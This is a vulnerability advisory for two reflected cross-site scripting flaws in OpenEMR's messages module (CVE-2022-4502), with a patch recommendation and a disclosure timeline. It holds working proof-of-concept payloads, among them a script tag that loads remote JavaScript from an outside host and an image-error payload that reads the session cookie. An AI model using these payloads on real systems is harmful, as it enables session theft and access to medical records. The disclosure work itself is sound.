OpenEMR – Multiple Reflected Cross-Site Scripting in Messages Module (CVE-2022-4502)

14/Dec/2022

Vendor:

URL:

Affected Versions:

Author:

CWE Category:

CVE Identifier:

CVSS Vector:

Severity:

OpenEMR

https://www.open-emr.org/

<= 7.0.0 patch1

Manuel Ginés Rodríguez

CWE-79

CVE-2022-4502

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

7.3 (High)

Summary

The messages module was affected by two instances of Cross-Site Scripting (XSS). The first one involved the “stage” parameter using “setup” functionality.

The second instance affected the parameter called “parameter” sent within post data while a message is being saved. The payload was reflected in the response that was set as HTML content-type.

Impact

This vulnerability allows a remote attacker gain control on the victims browser when a malicious link is clicked. The attacker could be able to steal the session cookie, trick the user to enter their credentials or, in general, take control on the web application flow.

Description

The first instance affects the messages.php file using this parameters:

http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//xt.rs%3E%3C/script%3E

The web page generated the following unparsed code that lead to a remote JavaScript being executed in the context of the user browser:

369: <title>MedEx Setup</title>
<br />
<span class=’title’>
<script src=//xt.rs></script> Warning: This is not a valid request.
</span>

* Execution of a remote script showing the cookie value

The second instance affected the message save functionality using “process” action, as can be shown below:

POST /openemr/interface/main/messages/save.php?action=process HTTP/1.1
Host: xxxxxxx
(…snip..)

parameter={“xss”:”<img%20src=x%20onerror=alert(document.cookie)>”}

This payload results in the parameter content being reflected in the server response that was using an HMTL content type, allowing the attacker to include javascript code in the JSON response that will be interpreted as HTML.

HTTP/1.1 200 OK
(…snip…)
Content-Type: text/html; charset=utf-8

{“xss”:”<img src=x onerror=alert(document.cookie)>“}

Execution of an XSS Payload that shows the cookie content

Recommendation

Update software to version 7.0.0 (patch 2) or apply the last patch provided.

References

https://www.open-emr.org/release-notes/patch2

https://huntr.dev/bounties/5bdef791-6886-4008-b9ba-045cb4524114/

Timeline



06/10/2022

Report created



07/10/2022

Vendor contacted



16/10/2022

Maintainer Acknowledge



19/10/2022

Validated and Fixed



30/11/2022

Published new release including fixes



14/12/2022

CVE and public release

Do you want to audit your company’s cybersecurity?

Contact a Pentest Specialist